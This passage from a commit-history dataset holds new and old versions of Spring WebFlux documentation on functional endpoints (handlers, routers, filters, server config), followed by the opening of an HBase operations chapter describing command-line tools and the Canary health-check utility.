<<webflux-fn-running>>.\n\n\n\n\n[[webflux-fn-handler-functions]]\n== HandlerFunction\n\n`ServerRequest` and `ServerResponse` are immutable interfaces that offer JDK-8 friendly\naccess to the HTTP request and response with\nhttp:\/\/www.reactive-streams.org[Reactive Streams] back pressure against the request\nand response body stream. The request body is represented with a Reactor `Flux` or `Mono`.\nThe response body is represented with any Reactive Streams `Publisher`, including `Flux`\nand `Mono`. For more on that see\n<<web-reactive.adoc#webflux-reactive-libraries,Reactive Libraries>>.\n\n\n\n[[webflux-fn-request]]\n=== ServerRequest\n\n`ServerRequest` provides access to the HTTP method, URI, headers, and query parameters\nwhile access to the body is provided through the `body` methods.\n\nTo extract the request body to a `Mono<String>`:\n\n Mono<String> string = request.bodyToMono(String.class);\n\nTo extract the body to a `Flux<Person>`, where `Person` objects are decoded from some\nserialized form, such as JSON or XML:\n\n Flux<Person> people = request.bodyToFlux(Person.class);\n\nThe above are shortcuts that use the more general `ServerRequest.body(BodyExtractor)`\nwhich accepts the `BodyExtractor` functional, strategy interface. The utility class\n`BodyExtractors` provides access to a number of instances. For example, the above can\nalso be written as follows:\n\n Mono<String> string = request.body(BodyExtractors.toMono(String.class));\n Flux<Person> people = request.body(BodyExtractors.toFlux(Person.class));\n\nTo access form data:\n\n Mono<MultiValueMap<String, String> map = request.body(BodyExtractors.toFormData());\n\nTo access multipart data as a map:\n\n Mono<MultiValueMap<String, Part> map = request.body(BodyExtractors.toMultipartData());\n\nTo access multiparts, one at a time, in streaming fashion:\n\n Flux<Part> parts = request.body(BodyExtractos.toParts());\n\n\n\n[[webflux-fn-response]]\n=== ServerResponse\n\n`ServerResponse` provides access to the HTTP response and since it is immutable, you use\na build to create it. The builder can be used to set the response status, to add response\nheaders, or to provide a body. Below is an example with a 200 (OK) response with JSON\ncontent:\n\n Mono<Person> person = ...\n ServerResponse.ok().contentType(MediaType.APPLICATION_JSON).body(person, Person.class);\n\nThis is how to build a 201 (CREATED) response with `\"Location\"` header, and no body:\n\n URI location = ...\n ServerResponse.created(location).build();\n\n\n\n[[webflux-fn-handler-classes]]\n=== Handler Classes\n\nWe can write a handler function as a lambda. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nHandlerFunction<ServerResponse> helloWorld =\n request -> ServerResponse.ok().body(fromObject(\"Hello World\"));\n----\n\nThat is convenient but in an application we need multiple functions and useful to group\nrelated handler functions together into a handler (like an `@Controller`). For example,\nhere is a class that exposes a reactive `Person` repository:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.ServerResponse.ok;\nimport static org.springframework.web.reactive.function.BodyInserters.fromObject;\n\npublic class PersonHandler {\n\n\tprivate final PersonRepository repository;\n\n\tpublic PersonHandler(PersonRepository repository) {\n\t\tthis.repository = repository;\n\t}\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) { \/\/ <1>\n\t\tFlux<Person> people = repository.allPeople();\n\t\treturn ok().contentType(APPLICATION_JSON).body(people, Person.class);\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) { \/\/ <2>\n\t\tMono<Person> person = request.bodyToMono(Person.class);\n\t\treturn ok().build(repository.savePerson(person));\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) { \/\/ <3>\n\t\tint personId = Integer.valueOf(request.pathVariable(\"id\"));\n\t\treturn repository.getPerson(personId)\n\t\t\t.flatMap(person -> ok().contentType(APPLICATION_JSON).body(fromObject(person)))\n\t\t\t.switchIfEmpty(ServerResponse.notFound().build());\n\t}\n}\n----\n<1> `listPeople` is a handler function that returns all `Person` objects found in the repository as\nJSON.\n<2> `createPerson` is a handler function that stores a new `Person` contained in the request body.\nNote that `PersonRepository.savePerson(Person)` returns `Mono<Void>`: an empty Mono that emits\na completion signal when the person has been read from the request and stored. So we use the\n`build(Publisher<Void>)` method to send a response when that completion signal is received, i.e.\nwhen the `Person` has been saved.\n<3> `getPerson` is a handler function that returns a single person, identified via the path\nvariable `id`. We retrieve that `Person` via the repository, and create a JSON response if it is\nfound. If it is not found, we use `switchIfEmpty(Mono<T>)` to return a 404 Not Found response.\n\n\n\n\n[[webflux-fn-router-functions]]\n== RouterFunction\n\n`RouterFunction` is used to route requests to a `HandlerFunction`. Typically, you do not\nwrite router functions yourself, but rather use\n`RouterFunctions.route(RequestPredicate, HandlerFunction)`. If the predicate applies, the\nrequest is routed to the given `HandlerFunction`, or otherwise no routing is performed,\nand that would translate to a 404 (Not Found) response.\n\n\n\n[[webflux-fn-predicates]]\n=== Predicates\n\nYou can write your own `RequestPredicate`, but the `RequestPredicates` utility class\noffers commonly implementations, based on the request path, HTTP method, content-type,\nand so on. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nRouterFunction<ServerResponse> route =\n\tRouterFunctions.route(RequestPredicates.path(\"\/hello-world\"),\n\trequest -> Response.ok().body(fromObject(\"Hello World\")));\n----\n\nYou can compose multiple request predicates together via:\n\n* `RequestPredicate.and(RequestPredicate)` -- both must match.\n* `RequestPredicate.or(RequestPredicate)` -- either may match.\n\nMany of the predicates from `RequestPredicates` are composed. For example\n`RequestPredicates.GET(String)` is composed from `RequestPredicates.method(HttpMethod)`\nand `RequestPredicates.path(String)`.\n\nYou can compose multiple router functions into one, such that they're evaluated in order,\nand if the first route doesn't match, the second is evaluated. You can declare more\nspecific routes before more general ones.\n\n\n\n[[webflux-fn-routes]]\n=== Routes\n\nYou can compose multiple router functions together via:\n\n* `RouterFunction.and(RouterFunction)`\n* `RouterFunction.andRoute(RequestPredicate, HandlerFunction)` -- shortcut for\n`RouterFunction.and()` with nested `RouterFunctions.route()`.\n\nUsing composed routes and predicates, we can then declare the following routes, referring\nto methods in the `PersonHandler`, shown in <<webflux-fn-handler-class>>, through\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/methodreferences.html[method-references]:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> personRoute =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n----\n\n\n\n\n\n[[webflux-fn-running]]\n== Running a server\n\nHow do you run a router function in an HTTP server? A simple option is to convert a router\nfunction to an `HttpHandler` using one of the following:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\nThe returned `HttpHandler` can then be used with a number of servers adapters by following\n<<web-reactive.adoc#webflux-httphandler,HttpHandler>> for server-specific instructions.\n\nA more advanced option is to run with a\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>>-based setup through the\n<<web-reactive.adoc#webflux-config>> which uses Spring configuration to declare the\ncomponents quired to process requests. The WebFlux Java config declares the following\ninfrastructure components to support functional endpoints:\n\n* `RouterFunctionMapping` -- detects one or more `RouterFunction<?>` beans in the Spring\nconfiguration, combines them via `RouterFunction.andOther`, and routes requests to the\nresulting composed `RouterFunction`.\n* `HandlerFunctionAdapter` -- simple adapter that allows the `DispatcherHandler` to invoke\na `HandlerFunction` that was mapped to a request.\n* `ServerResponseResultHandler` -- handles the result from the invocation of a\n`HandlerFunction` by invoking the `writeTo` method of the `ServerResponse`.\n\nThe above components allow functional endpoints to fit within the `DispatcherHandler` request\nprocessing lifecycle, and also potentially run side by side with annotated controllers, if\nany are declared. It is also how functional endpoints are enabled the Spring Boot WebFlux\nstarter.\n\nBelow is example WebFlux Java config (see\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>> for how to run):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Configuration\n@EnableWebFlux\npublic class WebConfig implements WebFluxConfigurer {\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionA() {\n\t\t\/\/ ...\n\t}\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionB() {\n\t\t\/\/ ...\n\t}\n\n\t\/\/ ...\n\n\t@Override\n\tpublic void configureHttpMessageCodecs(ServerCodecConfigurer configurer) {\n\t\t\/\/ configure message conversion...\n\t}\n\n\t@Override\n\tpublic void addCorsMappings(CorsRegistry registry) {\n\t\t\/\/ configure CORS...\n\t}\n\n\t@Override\n\tpublic void configureViewResolvers(ViewResolverRegistry registry) {\n\t\t\/\/ configure view resolution for HTML rendering...\n\t}\n}\n----\n\n\n\n\n[[webflux-fn-handler-filter-function]]\n== HandlerFilterFunction\n\nRoutes mapped by a router function can be filtered by calling\n`RouterFunction.filter(HandlerFilterFunction)`, where `HandlerFilterFunction` is essentially a\nfunction that takes a `ServerRequest` and `HandlerFunction`, and returns a `ServerResponse`.\nThe handler function parameter represents the next element in the chain: this is typically the\n`HandlerFunction` that is routed to, but can also be another `FilterFunction` if multiple filters\nare applied.\nWith annotations, similar functionality can be achieved using `@ControllerAdvice` and\/or a `ServletFilter`.\nLet's add a simple security filter to our route, assuming that we have a `SecurityManager` that\ncan determine whether a particular path is allowed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.HttpStatus.UNAUTHORIZED;\n\nSecurityManager securityManager = ...\nRouterFunction<ServerResponse> route = ...\n\nRouterFunction<ServerResponse> filteredRoute =\n\troute.filter((request, next) -> {\n\t\tif (securityManager.allowAccessTo(request.path())) {\n\t\t\treturn next.handle(request);\n\t\t}\n\t\telse {\n\t\t\treturn ServerResponse.status(UNAUTHORIZED).build();\n\t\t}\n });\n----\n\nYou can see in this example that invoking the `next.handle(ServerRequest)` is optional: we only\nallow the handler function to be executed when access is allowed.\n\n[NOTE]\n====\nCORS support for functional endpoints is provided via a dedicated <<webflux-cors-webfilter,`CorsWebFilter`>>.\n====\n","old_contents":"[[webflux-fn]]\n= Functional Endpoints\n\nSpring WebFlux includes a lightweight, functional programming model in which functions\nare used to route and handle requests and contracts are designed for immutability.\nIt is an alternative to the annotated-based programming model but otherwise running on\nthe same <<web-reactive.adoc#webflux-reactive-spring-web>> foundation\n\n\n\n\n[[webflux-fn-overview]]\n== Overview\n\nAn HTTP request is handled with a **`HandlerFunction`** that takes `ServerRequest` and\nreturns `Mono<ServerResponse>`, both of which are immutable contracts that offer JDK-8\nfriendly access to the HTTP request and response. `HandlerFunction` is the equivalent of\nan `@RequestMapping` method in the annotation-based programming model.\n\nRequests are routed to a `HandlerFunction` with a **`RouterFunction`** that takes\n`ServerRequest` and returns `Mono<HandlerFunction>`. When a request is matched to a\nparticular route, the `HandlerFunction` mapped to the route is used. `RouterFunction` is\nthe equivalent of an `@RequestMapping` annotation.\n\n`RouterFunctions.route(RequestPredicate, HandlerFunction)` provides a router function\ndefault implementation that can be used with a number of built-in request predicates.\nFor example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\nimport static org.springframework.web.reactive.function.server.RouterFunctions.route;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> route =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n\n\npublic class PersonHandler {\n\n\t\/\/ ...\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n}\n----\n\nOne way to run a `RouterFunction` is to turn it into an `HttpHandler` and install it\nthrough one of the built-in <<web-reactive.adoc#webflux-httphandler,server adapters>>:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\n\nMost applications will run through the WebFlux Java config, see <<webflux-fn-running>>.\n\n\n\n\n[[webflux-fn-handler-functions]]\n== HandlerFunction\n\n`ServerRequest` and `ServerResponse` are immutable interfaces that offer JDK-8 friendly\naccess to the HTTP request and response with\nhttp:\/\/www.reactive-streams.org[Reactive Streams] back pressure against the request\nand response body stream. The request body is represented with a Reactor `Flux` or `Mono`.\nThe response body is represented with any Reactive Streams `Publisher`, including `Flux`\nand `Mono`. For more on that see\n<<web-reactive.adoc#webflux-reactive-libraries,Reactive Libraries>>.\n\n\n\n[[webflux-fn-request]]\n=== ServerRequest\n\n`ServerRequest` provides access to the HTTP method, URI, headers, and query parameters\nwhile access to the body is provided through the `body` methods.\n\nTo extract the request body to a `Mono<String>`:\n\n Mono<String> string = request.bodyToMono(String.class);\n\nTo extract the body to a `Flux<Person>`, where `Person` objects are decoded from some\nserialized form, such as JSON or XML:\n\n Flux<Person> people = request.bodyToFlux(Person.class);\n\nThe above are shortcuts that use the more general `ServerRequest.body(BodyExtractor)`\nwhich accepts the `BodyExtractor` functional, strategy interface. The utility class\n`BodyExtractors` provides access to a number of instances. For example, the above can\nalso be written as follows:\n\n Mono<String> string = request.body(BodyExtractors.toMono(String.class));\n Flux<Person> people = request.body(BodyExtractors.toFlux(Person.class));\n\nTo access form data:\n\n Mono<MultiValueMap<String, String> map = request.body(BodyExtractors.toFormData());\n\nTo access multipart data as a map:\n\n Mono<MultiValueMap<String, Part> map = request.body(BodyExtractors.toMultipartData());\n\nTo access multiparts, one at a time, in streaming fashion:\n\n Flux<Part> parts = request.body(BodyExtractos.toParts());\n\n\n\n[[webflux-fn-response]]\n=== ServerResponse\n\n`ServerResponse` provides access to the HTTP response and since it is immutable, you use\na build to create it. The builder can be used to set the response status, to add response\nheaders, or to provide a body. Below is an example with a 200 (OK) response with JSON\ncontent:\n\n Mono<Person> person = ...\n ServerResponse.ok().contentType(MediaType.APPLICATION_JSON).body(person, Person.class);\n\nThis is how to build a 201 (CREATED) response with `\"Location\"` header, and no body:\n\n URI location = ...\n ServerResponse.created(location).build();\n\n\n\n[[webflux-fn-handler-classes]]\n=== Handler Classes\n\nWe can write a handler function as a lambda. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nHandlerFunction<ServerResponse> helloWorld =\n request -> ServerResponse.ok().body(fromObject(\"Hello World\"));\n----\n\nThat is convenient but in an application we need multiple functions and useful to group\nrelated handler functions together into a handler (like an `@Controller`). For example,\nhere is a class that exposes a reactive `Person` repository:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.ServerResponse.ok;\nimport static org.springframework.web.reactive.function.BodyInserters.fromObject;\n\npublic class PersonHandler {\n\n\tprivate final PersonRepository repository;\n\n\tpublic PersonHandler(PersonRepository repository) {\n\t\tthis.repository = repository;\n\t}\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) { \/\/ <1>\n\t\tFlux<Person> people = repository.allPeople();\n\t\treturn ok().contentType(APPLICATION_JSON).body(people, Person.class);\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) { \/\/ <2>\n\t\tMono<Person> person = request.bodyToMono(Person.class);\n\t\treturn ok().build(repository.savePerson(person));\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) { \/\/ <3>\n\t\tint personId = Integer.valueOf(request.pathVariable(\"id\"));\n\t\treturn repository.getPerson(personId)\n\t\t\t.flatMap(person -> ok().contentType(APPLICATION_JSON).body(fromObject(person)))\n\t\t\t.switchIfEmpty(ServerResponse.notFound().build());\n\t}\n}\n----\n<1> `listPeople` is a handler function that returns all `Person` objects found in the repository as\nJSON.\n<2> `createPerson` is a handler function that stores a new `Person` contained in the request body.\nNote that `PersonRepository.savePerson(Person)` returns `Mono<Void>`: an empty Mono that emits\na completion signal when the person has been read from the request and stored. So we use the\n`build(Publisher<Void>)` method to send a response when that completion signal is received, i.e.\nwhen the `Person` has been saved.\n<3> `getPerson` is a handler function that returns a single person, identified via the path\nvariable `id`. We retrieve that `Person` via the repository, and create a JSON response if it is\nfound. If it is not found, we use `switchIfEmpty(Mono<T>)` to return a 404 Not Found response.\n\n\n\n\n[[webflux-fn-router-functions]]\n== RouterFunction\n\n`RouterFunction` is used to route requests to a `HandlerFunction`. Typically, you do not\nwrite router functions yourself, but rather use\n`RouterFunctions.route(RequestPredicate, HandlerFunction)`. If the predicate applies, the\nrequest is routed to the given `HandlerFunction`, or otherwise no routing is performed,\nand that would translate to a 404 (Not Found) response.\n\n\n\n[[webflux-fn-predicates]]\n=== Predicates\n\nYou can write your own `RequestPredicate`, but the `RequestPredicates` utility class\noffers commonly implementations, based on the request path, HTTP method, content-type,\nand so on. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nRouterFunction<ServerResponse> route =\n\tRouterFunctions.route(RequestPredicates.path(\"\/hello-world\"),\n\trequest -> Response.ok().body(fromObject(\"Hello World\")));\n----\n\nYou can compose multiple request predicates together via:\n\n* `RequestPredicate.and(RequestPredicate)` -- both must match.\n* `RequestPredicate.or(RequestPredicate)` -- either may match.\n\nMany of the predicates from `RequestPredicates` are composed. For example\n`RequestPredicates.GET(String)` is composed from `RequestPredicates.method(HttpMethod)`\nand `RequestPredicates.path(String)`.\n\nYou can compose multiple router functions into one, such that they're evaluated in order,\nand if the first route doesn't match, the second is evaluated. You can declare more\nspecific routes before more general ones.\n\n\n\n[[webflux-fn-routes]]\n=== Routes\n\nYou can compose multiple router functions together via:\n\n* `RouterFunction.and(RouterFunction)`\n* `RouterFunction.andRoute(RequestPredicate, HandlerFunction)` -- shortcut for\n`RouterFunction.and()` with nested `RouterFunctions.route()`.\n\nUsing composed routes and predicates, we can then declare the following routes, referring\nto methods in the `PersonHandler`, shown in <<webflux-fn-handler-class>>, through\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/methodreferences.html[method-references]:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> personRoute =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n----\n\n\n\n\n\n[[webflux-fn-running]]\n== Running a server\n\nHow do you run a router function in an HTTP server? A simple option is to convert a router\nfunction to an `HttpHandler` using one of the following:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\nThe returned `HttpHandler` can then be used with a number of servers adapters by following\n<<web-reactive.adoc#webflux-httphandler,HttpHandler>> for server-specific instructions.\n\nA more advanced option is to run with a\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>>-based setup through the\n<<web-reactive.adoc#webflux-config>> which uses Spring configuration to declare the\ncomponents quired to process requests. The WebFlux Java config declares the following\ninfrastructure components to support functional endpoints:\n\n* `RouterFunctionMapping` -- detects one or more `RouterFunction<?>` beans in the Spring\nconfiguration, combines them via `RouterFunction.andOther`, and routes requests to the\nresulting composed `RouterFunction`.\n* `HandlerFunctionAdapter` -- simple adapter that allows the `DispatcherHandler` to invoke\na `HandlerFunction` that was mapped to a request.\n* `ServerResponseResultHandler` -- handles the result from the invocation of a\n`HandlerFunction` by invoking the `writeTo` method of the `ServerResponse`.\n\nThe above components allow functional endpoints to fit within the `DispatcherHandler` request\nprocessing lifecycle, and also potentially run side by side with annotated controllers, if\nany are declared. It is also how functional endpoints are enabled the Spring Boot WebFlux\nstarter.\n\nBelow is example WebFlux Java config (see\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>> for how to run):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Configuration\n@EnableWebFlux\npublic class WebConfig implements WebFluxConfigurer {\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionA() {\n\t\t\/\/ ...\n\t}\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionB() {\n\t\t\/\/ ...\n\t}\n\n\t\/\/ ...\n\n\t@Override\n\tpublic void configureHttpMessageCodecs(ServerCodecConfigurer configurer) {\n\t\t\/\/ configure message conversion...\n\t}\n\n\t@Override\n\tdefault void addCorsMappings(CorsRegistry registry) {\n\t\t\/\/ configure CORS...\n\t}\n\n\t@Override\n\tpublic void configureViewResolvers(ViewResolverRegistry registry) {\n\t\t\/\/ configure view resolution for HTML rendering...\n\t}\n}\n----\n\n\n\n\n[[webflux-fn-handler-filter-function]]\n== HandlerFilterFunction\n\nRoutes mapped by a router function can be filtered by calling\n`RouterFunction.filter(HandlerFilterFunction)`, where `HandlerFilterFunction` is essentially a\nfunction that takes a `ServerRequest` and `HandlerFunction`, and returns a `ServerResponse`.\nThe handler function parameter represents the next element in the chain: this is typically the\n`HandlerFunction` that is routed to, but can also be another `FilterFunction` if multiple filters\nare applied.\nWith annotations, similar functionality can be achieved using `@ControllerAdvice` and\/or a `ServletFilter`.\nLet's add a simple security filter to our route, assuming that we have a `SecurityManager` that\ncan determine whether a particular path is allowed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.HttpStatus.UNAUTHORIZED;\n\nSecurityManager securityManager = ...\nRouterFunction<ServerResponse> route = ...\n\nRouterFunction<ServerResponse> filteredRoute =\n\troute.filter((request, next) -> {\n\t\tif (securityManager.allowAccessTo(request.path())) {\n\t\t\treturn next.handle(request);\n\t\t}\n\t\telse {\n\t\t\treturn ServerResponse.status(UNAUTHORIZED).build();\n\t\t}\n });\n----\n\nYou can see in this example that invoking the `next.handle(ServerRequest)` is optional: we only\nallow the handler function to be executed when access is allowed.\n\n[NOTE]\n====\nCORS support for functional endpoints is provided via a dedicated <<webflux-cors-webfilter,`CorsWebFilter`>>.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6409a30aa634875467683203de0e21e0491986","subject":"HBASE-17918 document serial replication","message":"HBASE-17918 document serial replication\n\nSigned-off-by: zhangduo <ca823f7b4f21a31b6ef7892c1f90d53103f0d135@apache.org>\n","repos":"ChinmaySKulkarni\/hbase,ultratendency\/hbase,ultratendency\/hbase,mahak\/hbase,Eshcar\/hbase,ndimiduk\/hbase,ultratendency\/hbase,mahak\/hbase,Eshcar\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,Apache9\/hbase,apurtell\/hbase,Eshcar\/hbase,Eshcar\/hbase,mahak\/hbase,Apache9\/hbase,ndimiduk\/hbase,ultratendency\/hbase,apurtell\/hbase,apurtell\/hbase,bijugs\/hbase,francisliu\/hbase,apurtell\/hbase,apurtell\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,ndimiduk\/hbase,Eshcar\/hbase,ndimiduk\/hbase,Apache9\/hbase,francisliu\/hbase,ndimiduk\/hbase,mahak\/hbase,mahak\/hbase,mahak\/hbase,ultratendency\/hbase,Apache9\/hbase,francisliu\/hbase,Eshcar\/hbase,Apache9\/hbase,ndimiduk\/hbase,francisliu\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,apurtell\/hbase,bijugs\/hbase,mahak\/hbase,ndimiduk\/hbase,apurtell\/hbase,Apache9\/hbase,ndimiduk\/hbase,Eshcar\/hbase,apurtell\/hbase,apurtell\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,Apache9\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,mahak\/hbase,ndimiduk\/hbase,bijugs\/hbase,francisliu\/hbase,bijugs\/hbase,francisliu\/hbase,bijugs\/hbase,mahak\/hbase,mahak\/hbase,francisliu\/hbase,Apache9\/hbase,ultratendency\/hbase,Apache9\/hbase,Eshcar\/hbase,apurtell\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,Apache9\/hbase,ndimiduk\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter will cover operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThere is a Canary class can help users to canary-test the HBase cluster status, with every column-family for every regions or RegionServer's granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] | [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool will return non zero error codes to user for collaborating with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n\nHere are some examples based on the following given case.\nThere are two Table objects called test-01 and test-02, they have two column family cf1 and cf2 respectively, and deployed on the 3 RegionServers.\nsee following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\nFollowing are some examples based on the previous given case.\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n3\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from 